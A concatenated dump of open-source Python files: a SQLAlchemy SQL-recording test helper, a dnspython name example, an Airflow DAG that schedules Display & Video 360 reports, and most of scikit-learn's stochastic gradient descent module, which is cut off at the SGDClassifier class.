@contextlib.contextmanager
def assert_engine(engine):
    """Context manager that records SQL executed on *engine* and yields
    a SQLAsserter for making assertions afterwards."""
    asserter = SQLAsserter()

    orig = []

    @event.listens_for(engine, "before_execute")
    def connection_execute(conn, clauseelement, multiparams, params):
        # grab the original statement + params before any cursor
        # execution
        orig[:] = clauseelement, multiparams, params

    @event.listens_for(engine, "after_cursor_execute")
    def cursor_execute(conn, cursor, statement, parameters,
                       context, executemany):
        if not context:
            return
        # then grab real cursor statements and associate them all
        # around a single context
        if asserter.accumulated and \
                asserter.accumulated[-1].context is context:
            obs = asserter.accumulated[-1]
        else:
            obs = SQLExecuteObserved(context, orig[0], orig[1], orig[2])
            asserter.accumulated.append(obs)
        obs.statements.append(
            SQLCursorExecuteObserved(
                statement, parameters, context, executemany)
        )

    try:
        yield asserter
    finally:
        # Always detach the listeners so the engine is left clean, and
        # freeze the asserter's accumulated executions.
        event.remove(engine, "after_cursor_execute", cursor_execute)
        event.remove(engine, "before_execute", connection_execute)
        asserter._close()
|
freenas/samba | refs/heads/freenas/master | third_party/dnspython/examples/name.py | 82 | #!/usr/bin/env python
import dns.name
# Demonstrate dns.name comparisons and relativization.
# Fix: the original used Python-2-only print statements, which are a
# SyntaxError under Python 3; the single-argument print(...) form below
# behaves identically on Python 2 and 3.
n = dns.name.from_text('www.dnspython.org')
o = dns.name.from_text('dnspython.org')
print(n.is_subdomain(o))    # True
print(n.is_superdomain(o))  # False
print(n > o)                # True
rel = n.relativize(o)       # rel is the relative name www
n2 = rel + o
print(n2 == n)              # True
print(n.labels)             # ['www', 'dnspython', 'org', '']
|
fpy171/django | refs/heads/master | tests/decorators/__init__.py | 12133432 | |
CEG-FYP-OpenStack/scheduler | refs/heads/master | nova/network/security_group/__init__.py | 12133432 | |
Clyde-fare/scikit-learn | refs/heads/master | sklearn/tests/__init__.py | 12133432 | |
kool79/intellij-community | refs/heads/master | python/testData/resolve/multiFile/fromPackageImportIntoInit/pack/mod.py | 12133432 | |
google/autobidding-readiness-monitor | refs/heads/master | dags/algo_readiness_scheduler_dag.py | 1 | #
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Scheduler for the Algo Readiness Monitor.
This DAG does 2 things:
1. Records all the advertiser IDs for each partner (needed for SDF reporting) and stores them in an Airflow Variable.
2. Triggers one reporting DAG for each partner. The reporting DAGs are built by the algo_readiness_factory
"""
import datetime
import glob
from airflow import DAG
from airflow import models
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
from orchestra.google.marketing_platform.operators.display_video_360 import (
GoogleDisplayVideo360CreateReportOperator,
GoogleDisplayVideo360RunReportOperator,
GoogleDisplayVideo360DeleteReportOperator,
GoogleDisplayVideo360RecordSDFAdvertiserOperator
)
from orchestra.google.marketing_platform.sensors.display_video_360 import (
GoogleDisplayVideo360ReportSensor
)
from gps.utils.resource_helpers import ResourceLoader
import algo_readiness_factory_dag
# Declare config file path and load config
config_file_path = "dashboard.config"
resource_loader = ResourceLoader()
config = resource_loader.load_config(config_file_path)
# GCP connection ID passed to every operator below via gcp_conn_id.
CONN_ID = config["gcp_connection_id"]
# Comma-separated partner IDs from the Airflow Variable, split into a list.
partner_id_list = models.Variable.get("partner_ids").split(",")
def _get_default_args():
"""Builds the default DAG arguments.
Returns:
The default arguments.
"""
yesterday = datetime.datetime.combine(
datetime.datetime.today() - datetime.timedelta(days=1),
datetime.datetime.min.time())
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': yesterday,
'email_on_failure': False,
'email_on_retry': False,
'retries': 1,
'retry_delay': datetime.timedelta(minutes=5)
}
return default_args
def _get_dag_run_obj(context, dag_run_obj):
return dag_run_obj
def _build(dag_id, default_args):
    """Builds a new DAG defining the Algo Readiness workflow.

    Args:
        dag_id: The DAG ID.
        default_args: The default arguments for the DAG.

    Returns:
        The DAG object.
    """
    scheduler_dag = DAG(dag_id=dag_id, default_args=default_args)

    # --- Advertiser-recording pipeline ---------------------------------
    start_workflow = DummyOperator(
        task_id='start_workflow',
        dag=scheduler_dag)
    create_report = GoogleDisplayVideo360CreateReportOperator(
        task_id="create_report",
        gcp_conn_id=CONN_ID,
        report=resource_loader.get_report_path("dv360_adv_report.json"),
        params={"partners": partner_id_list},
        dag=scheduler_dag)
    # Jinja template resolved at runtime from the create_report XCom.
    query_id = "{{ task_instance.xcom_pull('create_report', key='query_id') }}"
    run_report = GoogleDisplayVideo360RunReportOperator(
        task_id="run_report",
        gcp_conn_id=CONN_ID,
        query_id=query_id,
        dag=scheduler_dag)
    wait_for_report = GoogleDisplayVideo360ReportSensor(
        task_id="wait_for_report",
        gcp_conn_id=CONN_ID,
        query_id=query_id,
        dag=scheduler_dag)
    report_url = "{{ task_instance.xcom_pull('wait_for_report', key='report_url') }}"
    record_advertisers = GoogleDisplayVideo360RecordSDFAdvertiserOperator(
        task_id='record_advertisers',
        conn_id=CONN_ID,
        report_url=report_url,
        variable_name='dv360_sdf_advertisers',
        dag=scheduler_dag)
    delete_report = GoogleDisplayVideo360DeleteReportOperator(
        task_id="delete_report",
        gcp_conn_id=CONN_ID,
        query_id=query_id,
        dag=scheduler_dag)

    # Wire the advertiser-recording chain.
    start_workflow >> create_report >> run_report
    run_report >> wait_for_report >> record_advertisers >> delete_report

    # --- Fan out: trigger one reporting DAG per partner ----------------
    for partner_id in partner_id_list:
        trigger_dag_id = algo_readiness_factory_dag.build_dag_id(
            partner_id)
        trigger_dag_task = TriggerDagRunOperator(
            task_id=f'trigger_{trigger_dag_id}',
            trigger_dag_id=trigger_dag_id,
            python_callable=_get_dag_run_obj,
            dag=scheduler_dag)
        delete_report >> trigger_dag_task
    return scheduler_dag
# Instantiate the scheduler DAG at import time so Airflow's DAG discovery
# picks it up from this module's global namespace.
dag = _build(
    dag_id='algo_readiness_scheduler',
    default_args=_get_default_args())
|
ndingwall/scikit-learn | refs/heads/master | sklearn/linear_model/_stochastic_gradient.py | 2 | # Authors: Peter Prettenhofer <peter.prettenhofer@gmail.com> (main author)
# Mathieu Blondel (partial_fit support)
#
# License: BSD 3 clause
"""Classification and regression using Stochastic Gradient Descent (SGD)."""
import numpy as np
import warnings
from abc import ABCMeta, abstractmethod
from joblib import Parallel
from ..base import clone, is_classifier
from ._base import LinearClassifierMixin, SparseCoefMixin
from ._base import make_dataset
from ..base import BaseEstimator, RegressorMixin
from ..utils import check_array, check_random_state, check_X_y
from ..utils.extmath import safe_sparse_dot
from ..utils.multiclass import _check_partial_fit_first_call
from ..utils.validation import check_is_fitted, _check_sample_weight
from ..utils.validation import _deprecate_positional_args
from ..utils.fixes import delayed
from ..exceptions import ConvergenceWarning
from ..model_selection import StratifiedShuffleSplit, ShuffleSplit
from ._sgd_fast import _plain_sgd
from ..utils import compute_class_weight
from ._sgd_fast import Hinge
from ._sgd_fast import SquaredHinge
from ._sgd_fast import Log
from ._sgd_fast import ModifiedHuber
from ._sgd_fast import SquaredLoss
from ._sgd_fast import Huber
from ._sgd_fast import EpsilonInsensitive
from ._sgd_fast import SquaredEpsilonInsensitive
from ..utils.fixes import _joblib_parallel_args
from ..utils import deprecated
# Integer codes for each learning-rate schedule, passed to the Cython
# ``_plain_sgd`` routine.
LEARNING_RATE_TYPES = {"constant": 1, "optimal": 2, "invscaling": 3,
                       "adaptive": 4, "pa1": 5, "pa2": 6}
# Integer codes for the supported penalty (regularization) types.
PENALTY_TYPES = {"none": 0, "l2": 2, "l1": 1, "elasticnet": 3}
DEFAULT_EPSILON = 0.1
# Default value of ``epsilon`` parameter.
# Largest value usable as a random seed: numpy's mtrand expects a C long,
# which is a signed 32-bit integer on Windows.
MAX_INT = np.iinfo(np.int32).max
class _ValidationScoreCallback:
    """Callback for early stopping based on validation score.

    A clone of the estimator is scored on the held-out validation data
    each time the training loop invokes the instance with the current
    ``(coef, intercept)``.
    """

    def __init__(self, estimator, X_val, y_val, sample_weight_val,
                 classes=None):
        self.estimator = clone(estimator)
        self.estimator.t_ = 1  # to pass check_is_fitted
        if classes is not None:
            self.estimator.classes_ = classes
        self.X_val = X_val
        self.y_val = y_val
        self.sample_weight_val = sample_weight_val

    def __call__(self, coef, intercept):
        # Inject the current weights into the clone, then score it on the
        # validation split.
        self.estimator.coef_ = coef.reshape(1, -1)
        self.estimator.intercept_ = np.atleast_1d(intercept)
        return self.estimator.score(self.X_val, self.y_val,
                                    self.sample_weight_val)
class BaseSGD(SparseCoefMixin, BaseEstimator, metaclass=ABCMeta):
    """Base class for SGD classification and regression."""

    @_deprecate_positional_args
    def __init__(self, loss, *, penalty='l2', alpha=0.0001, C=1.0,
                 l1_ratio=0.15, fit_intercept=True, max_iter=1000, tol=1e-3,
                 shuffle=True, verbose=0, epsilon=0.1, random_state=None,
                 learning_rate="optimal", eta0=0.0, power_t=0.5,
                 early_stopping=False, validation_fraction=0.1,
                 n_iter_no_change=5, warm_start=False, average=False):
        self.loss = loss
        self.penalty = penalty
        self.learning_rate = learning_rate
        self.epsilon = epsilon
        self.alpha = alpha
        self.C = C
        self.l1_ratio = l1_ratio
        self.fit_intercept = fit_intercept
        self.shuffle = shuffle
        self.random_state = random_state
        self.verbose = verbose
        self.eta0 = eta0
        self.power_t = power_t
        self.early_stopping = early_stopping
        self.validation_fraction = validation_fraction
        self.n_iter_no_change = n_iter_no_change
        self.warm_start = warm_start
        self.average = average
        self.max_iter = max_iter
        self.tol = tol
        # current tests expect init to do parameter validation
        # but we are not allowed to set attributes
        self._validate_params()

    def set_params(self, **kwargs):
        """Set and validate the parameters of estimator.

        Parameters
        ----------
        **kwargs : dict
            Estimator parameters.

        Returns
        -------
        self : object
            Estimator instance.
        """
        super().set_params(**kwargs)
        # Re-validate so invalid values set after construction fail fast
        # rather than at fit time.
        self._validate_params()
        return self

    @abstractmethod
    def fit(self, X, y):
        """Fit model."""

    def _validate_params(self, for_partial_fit=False):
        """Validate input params. """
        if not isinstance(self.shuffle, bool):
            raise ValueError("shuffle must be either True or False")
        if not isinstance(self.early_stopping, bool):
            raise ValueError("early_stopping must be either True or False")
        # partial_fit trains incrementally, so there is no fixed training
        # run to early-stop.
        if self.early_stopping and for_partial_fit:
            raise ValueError("early_stopping should be False with partial_fit")
        if self.max_iter is not None and self.max_iter <= 0:
            raise ValueError("max_iter must be > zero. Got %f" % self.max_iter)
        if not (0.0 <= self.l1_ratio <= 1.0):
            raise ValueError("l1_ratio must be in [0, 1]")
        if self.alpha < 0.0:
            raise ValueError("alpha must be >= 0")
        if self.n_iter_no_change < 1:
            raise ValueError("n_iter_no_change must be >= 1")
        if not (0.0 < self.validation_fraction < 1.0):
            raise ValueError("validation_fraction must be in range (0, 1)")
        # eta0 is only meaningful for schedules that actually start from it.
        if self.learning_rate in ("constant", "invscaling", "adaptive"):
            if self.eta0 <= 0.0:
                raise ValueError("eta0 must be > 0")
        if self.learning_rate == "optimal" and self.alpha == 0:
            raise ValueError("alpha must be > 0 since "
                             "learning_rate is 'optimal'. alpha is used "
                             "to compute the optimal learning rate.")
        # raises ValueError if not registered
        self._get_penalty_type(self.penalty)
        self._get_learning_rate_type(self.learning_rate)
        if self.loss not in self.loss_functions:
            raise ValueError("The loss %s is not supported. " % self.loss)

    def _get_loss_function(self, loss):
        """Get concrete ``LossFunction`` object for str ``loss``. """
        try:
            loss_ = self.loss_functions[loss]
            loss_class, args = loss_[0], loss_[1:]
            if loss in ('huber', 'epsilon_insensitive',
                        'squared_epsilon_insensitive'):
                # These losses take the user-supplied epsilon instead of the
                # table default.
                args = (self.epsilon, )
            return loss_class(*args)
        except KeyError as e:
            raise ValueError("The loss %s is not supported. " % loss) from e

    def _get_learning_rate_type(self, learning_rate):
        """Map a schedule name to its integer code for the Cython routine."""
        try:
            return LEARNING_RATE_TYPES[learning_rate]
        except KeyError as e:
            raise ValueError("learning rate %s "
                             "is not supported. " % learning_rate) from e

    def _get_penalty_type(self, penalty):
        """Map a penalty name (case-insensitive) to its integer code."""
        penalty = str(penalty).lower()
        try:
            return PENALTY_TYPES[penalty]
        except KeyError as e:
            raise ValueError("Penalty %s is not supported. " % penalty) from e

    def _allocate_parameter_mem(self, n_classes, n_features, coef_init=None,
                                intercept_init=None):
        """Allocate mem for parameters; initialize if provided."""
        if n_classes > 2:
            # allocate coef_ for multi-class
            if coef_init is not None:
                coef_init = np.asarray(coef_init, order="C")
                if coef_init.shape != (n_classes, n_features):
                    raise ValueError("Provided ``coef_`` does not match "
                                     "dataset. ")
                self.coef_ = coef_init
            else:
                self.coef_ = np.zeros((n_classes, n_features),
                                      dtype=np.float64, order="C")
            # allocate intercept_ for multi-class
            if intercept_init is not None:
                intercept_init = np.asarray(intercept_init, order="C")
                if intercept_init.shape != (n_classes, ):
                    raise ValueError("Provided intercept_init "
                                     "does not match dataset.")
                self.intercept_ = intercept_init
            else:
                self.intercept_ = np.zeros(n_classes, dtype=np.float64,
                                           order="C")
        else:
            # allocate coef_ for binary problem
            if coef_init is not None:
                coef_init = np.asarray(coef_init, dtype=np.float64,
                                       order="C")
                coef_init = coef_init.ravel()
                if coef_init.shape != (n_features,):
                    raise ValueError("Provided coef_init does not "
                                     "match dataset.")
                self.coef_ = coef_init
            else:
                self.coef_ = np.zeros(n_features,
                                      dtype=np.float64,
                                      order="C")
            # allocate intercept_ for binary problem
            if intercept_init is not None:
                intercept_init = np.asarray(intercept_init, dtype=np.float64)
                # Accept both a length-1 array and a scalar-shaped array.
                if intercept_init.shape != (1,) and intercept_init.shape != ():
                    raise ValueError("Provided intercept_init "
                                     "does not match dataset.")
                self.intercept_ = intercept_init.reshape(1,)
            else:
                self.intercept_ = np.zeros(1, dtype=np.float64, order="C")
        # initialize average parameters
        if self.average > 0:
            # Averaged SGD keeps a second set of buffers; the "standard"
            # attributes alias the non-averaged weights during training.
            self._standard_coef = self.coef_
            self._standard_intercept = self.intercept_
            self._average_coef = np.zeros(self.coef_.shape,
                                          dtype=np.float64,
                                          order="C")
            self._average_intercept = np.zeros(self._standard_intercept.shape,
                                               dtype=np.float64,
                                               order="C")

    def _make_validation_split(self, y):
        """Split the dataset between training set and validation set.

        Parameters
        ----------
        y : ndarray of shape (n_samples, )
            Target values.

        Returns
        -------
        validation_mask : ndarray of shape (n_samples, )
            Equal to 1 on the validation set, 0 on the training set.
        """
        n_samples = y.shape[0]
        validation_mask = np.zeros(n_samples, dtype=np.uint8)
        if not self.early_stopping:
            # use the full set for training, with an empty validation set
            return validation_mask
        if is_classifier(self):
            # Stratify so each class is represented in the validation set.
            splitter_type = StratifiedShuffleSplit
        else:
            splitter_type = ShuffleSplit
        cv = splitter_type(test_size=self.validation_fraction,
                           random_state=self.random_state)
        idx_train, idx_val = next(cv.split(np.zeros(shape=(y.shape[0], 1)), y))
        if idx_train.shape[0] == 0 or idx_val.shape[0] == 0:
            raise ValueError(
                "Splitting %d samples into a train set and a validation set "
                "with validation_fraction=%r led to an empty set (%d and %d "
                "samples). Please either change validation_fraction, increase "
                "number of samples, or disable early_stopping."
                % (n_samples, self.validation_fraction, idx_train.shape[0],
                   idx_val.shape[0]))
        validation_mask[idx_val] = 1
        return validation_mask

    def _make_validation_score_cb(self, validation_mask, X, y, sample_weight,
                                  classes=None):
        # Returns None when early stopping is disabled; otherwise a callback
        # scoring on the validation subset.
        # NOTE(review): validation_mask is uint8 (0/1), so X[validation_mask]
        # is integer fancy indexing, not boolean masking — confirm intended.
        if not self.early_stopping:
            return None
        return _ValidationScoreCallback(
            self, X[validation_mask], y[validation_mask],
            sample_weight[validation_mask], classes=classes)

    # The four properties below expose the private averaged/standard buffers
    # under their pre-0.23 public names, with a deprecation warning.

    # mypy error: Decorated property not supported
    @deprecated("Attribute standard_coef_ was deprecated "  # type: ignore
                "in version 0.23 and will be removed in 0.25.")
    @property
    def standard_coef_(self):
        return self._standard_coef

    # mypy error: Decorated property not supported
    @deprecated(  # type: ignore
        "Attribute standard_intercept_ was deprecated "
        "in version 0.23 and will be removed in 0.25."
    )
    @property
    def standard_intercept_(self):
        return self._standard_intercept

    # mypy error: Decorated property not supported
    @deprecated("Attribute average_coef_ was deprecated "  # type: ignore
                "in version 0.23 and will be removed in 0.25.")
    @property
    def average_coef_(self):
        return self._average_coef

    # mypy error: Decorated property not supported
    @deprecated("Attribute average_intercept_ was deprecated "  # type: ignore
                "in version 0.23 and will be removed in 0.25.")
    @property
    def average_intercept_(self):
        return self._average_intercept
def _prepare_fit_binary(est, y, i):
"""Initialization for fit_binary.
Returns y, coef, intercept, average_coef, average_intercept.
"""
y_i = np.ones(y.shape, dtype=np.float64, order="C")
y_i[y != est.classes_[i]] = -1.0
average_intercept = 0
average_coef = None
if len(est.classes_) == 2:
if not est.average:
coef = est.coef_.ravel()
intercept = est.intercept_[0]
else:
coef = est._standard_coef.ravel()
intercept = est._standard_intercept[0]
average_coef = est._average_coef.ravel()
average_intercept = est._average_intercept[0]
else:
if not est.average:
coef = est.coef_[i]
intercept = est.intercept_[i]
else:
coef = est._standard_coef[i]
intercept = est._standard_intercept[i]
average_coef = est._average_coef[i]
average_intercept = est._average_intercept[i]
return y_i, coef, intercept, average_coef, average_intercept
def fit_binary(est, i, X, y, alpha, C, learning_rate, max_iter,
               pos_weight, neg_weight, sample_weight, validation_mask=None,
               random_state=None):
    """Fit a single binary classifier.

    The i'th class is considered the "positive" class.

    Parameters
    ----------
    est : Estimator object
        The estimator to fit
    i : int
        Index of the positive class
    X : numpy array or sparse matrix of shape [n_samples,n_features]
        Training data
    y : numpy array of shape [n_samples, ]
        Target values
    alpha : float
        The regularization parameter
    C : float
        Maximum step size for passive aggressive
    learning_rate : string
        The learning rate. Accepted values are 'constant', 'optimal',
        'invscaling', 'pa1' and 'pa2'.
    max_iter : int
        The maximum number of iterations (epochs)
    pos_weight : float
        The weight of the positive class
    neg_weight : float
        The weight of the negative class
    sample_weight : numpy array of shape [n_samples, ]
        The weight of each sample
    validation_mask : numpy array of shape [n_samples, ], default=None
        Precomputed validation mask in case _fit_binary is called in the
        context of a one-vs-rest reduction.
    random_state : int, RandomState instance, default=None
        If int, random_state is the seed used by the random number generator;
        If RandomState instance, random_state is the random number generator;
        If None, the random number generator is the RandomState instance used
        by `np.random`.
    """
    # if average is not true, average_coef, and average_intercept will be
    # unused
    y_i, coef, intercept, average_coef, average_intercept = \
        _prepare_fit_binary(est, y, i)
    assert y_i.shape[0] == y.shape[0] == sample_weight.shape[0]
    random_state = check_random_state(random_state)
    # Wrap the data in the (possibly sparse) dataset abstraction consumed by
    # the Cython training loop.
    dataset, intercept_decay = make_dataset(
        X, y_i, sample_weight, random_state=random_state)
    penalty_type = est._get_penalty_type(est.penalty)
    learning_rate_type = est._get_learning_rate_type(learning_rate)
    if validation_mask is None:
        # No precomputed mask: split on the binarized labels.
        validation_mask = est._make_validation_split(y_i)
    classes = np.array([-1, 1], dtype=y_i.dtype)
    validation_score_cb = est._make_validation_score_cb(
        validation_mask, X, y_i, sample_weight, classes=classes)
    # numpy mtrand expects a C long which is a signed 32 bit integer under
    # Windows
    seed = random_state.randint(MAX_INT)
    # tol=None means "never stop on tolerance"; -inf disables that check in
    # the Cython loop.
    tol = est.tol if est.tol is not None else -np.inf
    # Delegate the actual optimization to the compiled SGD routine. The
    # argument order here must match the _plain_sgd signature exactly.
    coef, intercept, average_coef, average_intercept, n_iter_ = _plain_sgd(
        coef, intercept, average_coef, average_intercept, est.loss_function_,
        penalty_type, alpha, C, est.l1_ratio, dataset, validation_mask,
        est.early_stopping, validation_score_cb, int(est.n_iter_no_change),
        max_iter, tol, int(est.fit_intercept), int(est.verbose),
        int(est.shuffle), seed, pos_weight, neg_weight, learning_rate_type,
        est.eta0, est.power_t, est.t_, intercept_decay, est.average)
    if est.average:
        # Write the final averaged intercept back into the estimator's
        # per-class buffer (coef buffers are updated in place).
        if len(est.classes_) == 2:
            est._average_intercept[0] = average_intercept
        else:
            est._average_intercept[i] = average_intercept
    return coef, intercept, n_iter_
class BaseSGDClassifier(LinearClassifierMixin, BaseSGD, metaclass=ABCMeta):
    """Base class for SGD classifiers.

    Trains one binary model per class (one-vs-all) via ``fit_binary`` and
    exposes the ``fit`` / ``partial_fit`` API.
    """

    # Map loss name -> (LossFunction class, default constructor args).
    # Epsilon-parameterized losses are re-built with ``self.epsilon`` in
    # BaseSGD._get_loss_function.
    loss_functions = {
        "hinge": (Hinge, 1.0),
        "squared_hinge": (SquaredHinge, 1.0),
        "perceptron": (Hinge, 0.0),
        "log": (Log, ),
        "modified_huber": (ModifiedHuber, ),
        "squared_loss": (SquaredLoss, ),
        "huber": (Huber, DEFAULT_EPSILON),
        "epsilon_insensitive": (EpsilonInsensitive, DEFAULT_EPSILON),
        "squared_epsilon_insensitive": (SquaredEpsilonInsensitive,
                                        DEFAULT_EPSILON),
    }

    @abstractmethod
    @_deprecate_positional_args
    def __init__(self, loss="hinge", *, penalty='l2', alpha=0.0001,
                 l1_ratio=0.15, fit_intercept=True, max_iter=1000, tol=1e-3,
                 shuffle=True, verbose=0, epsilon=DEFAULT_EPSILON, n_jobs=None,
                 random_state=None, learning_rate="optimal", eta0=0.0,
                 power_t=0.5, early_stopping=False,
                 validation_fraction=0.1, n_iter_no_change=5,
                 class_weight=None, warm_start=False, average=False):
        super().__init__(
            loss=loss, penalty=penalty, alpha=alpha, l1_ratio=l1_ratio,
            fit_intercept=fit_intercept, max_iter=max_iter, tol=tol,
            shuffle=shuffle, verbose=verbose, epsilon=epsilon,
            random_state=random_state, learning_rate=learning_rate, eta0=eta0,
            power_t=power_t, early_stopping=early_stopping,
            validation_fraction=validation_fraction,
            n_iter_no_change=n_iter_no_change, warm_start=warm_start,
            average=average)
        self.class_weight = class_weight
        self.n_jobs = n_jobs

    def _partial_fit(self, X, y, alpha, C,
                     loss, learning_rate, max_iter,
                     classes, sample_weight,
                     coef_init, intercept_init):
        # Shared implementation behind fit (max_iter epochs) and partial_fit
        # (one epoch).
        X, y = check_X_y(X, y, accept_sparse='csr', dtype=np.float64,
                         order="C", accept_large_sparse=False)
        n_samples, n_features = X.shape
        # Validates `classes` on the first call and checks consistency on
        # subsequent calls; sets self.classes_.
        _check_partial_fit_first_call(self, classes)
        n_classes = self.classes_.shape[0]
        # Allocate datastructures from input arguments
        self._expanded_class_weight = compute_class_weight(
            self.class_weight, classes=self.classes_, y=y)
        sample_weight = _check_sample_weight(sample_weight, X)
        if getattr(self, "coef_", None) is None or coef_init is not None:
            self._allocate_parameter_mem(n_classes, n_features,
                                         coef_init, intercept_init)
        elif n_features != self.coef_.shape[-1]:
            raise ValueError("Number of features %d does not match previous "
                             "data %d." % (n_features, self.coef_.shape[-1]))
        self.loss_function_ = self._get_loss_function(loss)
        if not hasattr(self, "t_"):
            # Global sample counter used by the learning-rate schedules.
            self.t_ = 1.0
        # delegate to concrete training procedure
        if n_classes > 2:
            self._fit_multiclass(X, y, alpha=alpha, C=C,
                                 learning_rate=learning_rate,
                                 sample_weight=sample_weight,
                                 max_iter=max_iter)
        elif n_classes == 2:
            self._fit_binary(X, y, alpha=alpha, C=C,
                             learning_rate=learning_rate,
                             sample_weight=sample_weight,
                             max_iter=max_iter)
        else:
            raise ValueError(
                "The number of classes has to be greater than one;"
                " got %d class" % n_classes)
        return self

    def _fit(self, X, y, alpha, C, loss, learning_rate, coef_init=None,
             intercept_init=None, sample_weight=None):
        self._validate_params()
        if hasattr(self, "classes_"):
            # Reset so _check_partial_fit_first_call treats this as a fresh
            # fit rather than a continuation.
            self.classes_ = None
        X, y = self._validate_data(X, y, accept_sparse='csr',
                                   dtype=np.float64, order="C",
                                   accept_large_sparse=False)
        # labels can be encoded as float, int, or string literals
        # np.unique sorts in asc order; largest class id is positive class
        classes = np.unique(y)
        if self.warm_start and hasattr(self, "coef_"):
            if coef_init is None:
                coef_init = self.coef_
            if intercept_init is None:
                intercept_init = self.intercept_
        else:
            self.coef_ = None
            self.intercept_ = None
        if self.average > 0:
            self._standard_coef = self.coef_
            self._standard_intercept = self.intercept_
            self._average_coef = None
            self._average_intercept = None
        # Clear iteration count for multiple call to fit.
        self.t_ = 1.0
        self._partial_fit(X, y, alpha, C, loss, learning_rate, self.max_iter,
                          classes, sample_weight, coef_init, intercept_init)
        if (self.tol is not None and self.tol > -np.inf
                and self.n_iter_ == self.max_iter):
            warnings.warn("Maximum number of iteration reached before "
                          "convergence. Consider increasing max_iter to "
                          "improve the fit.",
                          ConvergenceWarning)
        return self

    def _fit_binary(self, X, y, alpha, C, sample_weight,
                    learning_rate, max_iter):
        """Fit a binary classifier on X and y. """
        # Index 1 (the larger class id) is the positive class by convention.
        coef, intercept, n_iter_ = fit_binary(self, 1, X, y, alpha, C,
                                              learning_rate, max_iter,
                                              self._expanded_class_weight[1],
                                              self._expanded_class_weight[0],
                                              sample_weight,
                                              random_state=self.random_state)
        self.t_ += n_iter_ * X.shape[0]
        self.n_iter_ = n_iter_
        # need to be 2d
        if self.average > 0:
            # Expose the averaged weights once enough samples were seen;
            # otherwise keep the plain SGD weights.
            if self.average <= self.t_ - 1:
                self.coef_ = self._average_coef.reshape(1, -1)
                self.intercept_ = self._average_intercept
            else:
                self.coef_ = self._standard_coef.reshape(1, -1)
                self._standard_intercept = np.atleast_1d(intercept)
                self.intercept_ = self._standard_intercept
        else:
            self.coef_ = coef.reshape(1, -1)
            # intercept is a float, need to convert it to an array of length 1
            self.intercept_ = np.atleast_1d(intercept)

    def _fit_multiclass(self, X, y, alpha, C, learning_rate,
                        sample_weight, max_iter):
        """Fit a multi-class classifier by combining binary classifiers

        Each binary classifier predicts one class versus all others. This
        strategy is called OvA (One versus All) or OvR (One versus Rest).
        """
        # Precompute the validation split using the multiclass labels
        # to ensure proper balancing of the classes.
        validation_mask = self._make_validation_split(y)
        # Use joblib to fit OvA in parallel.
        # Pick the random seed for each job outside of fit_binary to avoid
        # sharing the estimator random state between threads which could lead
        # to non-deterministic behavior
        random_state = check_random_state(self.random_state)
        seeds = random_state.randint(MAX_INT, size=len(self.classes_))
        result = Parallel(n_jobs=self.n_jobs, verbose=self.verbose,
                          **_joblib_parallel_args(require="sharedmem"))(
            delayed(fit_binary)(self, i, X, y, alpha, C, learning_rate,
                                max_iter, self._expanded_class_weight[i],
                                1., sample_weight,
                                validation_mask=validation_mask,
                                random_state=seed)
            for i, seed in enumerate(seeds))
        # take the maximum of n_iter_ over every binary fit
        n_iter_ = 0.
        for i, (_, intercept, n_iter_i) in enumerate(result):
            self.intercept_[i] = intercept
            n_iter_ = max(n_iter_, n_iter_i)
        self.t_ += n_iter_ * X.shape[0]
        self.n_iter_ = n_iter_
        if self.average > 0:
            if self.average <= self.t_ - 1.0:
                self.coef_ = self._average_coef
                self.intercept_ = self._average_intercept
            else:
                self.coef_ = self._standard_coef
                self._standard_intercept = np.atleast_1d(self.intercept_)
                self.intercept_ = self._standard_intercept

    def partial_fit(self, X, y, classes=None, sample_weight=None):
        """Perform one epoch of stochastic gradient descent on given samples.

        Internally, this method uses ``max_iter = 1``. Therefore, it is not
        guaranteed that a minimum of the cost function is reached after calling
        it once. Matters such as objective convergence and early stopping
        should be handled by the user.

        Parameters
        ----------
        X : {array-like, sparse matrix}, shape (n_samples, n_features)
            Subset of the training data.
        y : ndarray of shape (n_samples,)
            Subset of the target values.
        classes : ndarray of shape (n_classes,), default=None
            Classes across all calls to partial_fit.
            Can be obtained via `np.unique(y_all)`, where y_all is the
            target vector of the entire dataset.
            This argument is required for the first call to partial_fit
            and can be omitted in the subsequent calls.
            Note that y doesn't need to contain all labels in `classes`.
        sample_weight : array-like, shape (n_samples,), default=None
            Weights applied to individual samples.
            If not provided, uniform weights are assumed.

        Returns
        -------
        self :
            Returns an instance of self.
        """
        self._validate_params(for_partial_fit=True)
        if self.class_weight in ['balanced']:
            # 'balanced' needs the full class distribution, which is unknown
            # when data arrives incrementally.
            # (typo fixed below: "can us" -> "can use")
            raise ValueError("class_weight '{0}' is not supported for "
                             "partial_fit. In order to use 'balanced' weights,"
                             " use compute_class_weight('{0}', "
                             "classes=classes, y=y). "
                             "In place of y you can use a large enough sample "
                             "of the full training set target to properly "
                             "estimate the class frequency distributions. "
                             "Pass the resulting weights as the class_weight "
                             "parameter.".format(self.class_weight))
        return self._partial_fit(X, y, alpha=self.alpha, C=1.0, loss=self.loss,
                                 learning_rate=self.learning_rate, max_iter=1,
                                 classes=classes, sample_weight=sample_weight,
                                 coef_init=None, intercept_init=None)

    def fit(self, X, y, coef_init=None, intercept_init=None,
            sample_weight=None):
        """Fit linear model with Stochastic Gradient Descent.

        Parameters
        ----------
        X : {array-like, sparse matrix}, shape (n_samples, n_features)
            Training data.
        y : ndarray of shape (n_samples,)
            Target values.
        coef_init : ndarray of shape (n_classes, n_features), default=None
            The initial coefficients to warm-start the optimization.
        intercept_init : ndarray of shape (n_classes,), default=None
            The initial intercept to warm-start the optimization.
        sample_weight : array-like, shape (n_samples,), default=None
            Weights applied to individual samples.
            If not provided, uniform weights are assumed. These weights will
            be multiplied with class_weight (passed through the
            constructor) if class_weight is specified.

        Returns
        -------
        self :
            Returns an instance of self.
        """
        return self._fit(X, y, alpha=self.alpha, C=1.0,
                         loss=self.loss, learning_rate=self.learning_rate,
                         coef_init=coef_init, intercept_init=intercept_init,
                         sample_weight=sample_weight)
class SGDClassifier(BaseSGDClassifier):
